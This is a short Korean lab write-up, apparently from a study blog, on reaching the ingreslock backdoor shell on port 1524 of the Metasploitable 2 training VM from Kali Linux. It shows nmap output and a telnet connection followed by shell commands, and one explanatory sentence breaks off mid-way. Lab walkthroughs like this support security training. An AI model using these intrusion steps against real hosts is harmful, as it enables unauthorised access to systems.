본문 바로가기

Learning/└◆Metasploit

Metasploitable V2 Linux 서버의 취약점(Ingreslock)

(7) 버그를 공격하는 경우(Backdoor 존재하는 경우)

 

실습 시스템

- KaliLinux (EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

 

공격의 개요

 

Ingreslock backdoor

Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server

1524번 포트는 Ingre 데이터 베이스 Lock 서비스용 포트이다. 이 포트는 512

 

 

취약점 공격 과정(backdoor 존재하는 경우)

 

(KaliLinux)

# nmap 192.168.10.134

....

1099/tcp open rmiregistry

1524/tcp open ingreslock

2049/tcp open nfs

2121/tcp open ccproxy-ftp

....

 

# telnet 192.168.10.134 1524

# hostname

# id

# exit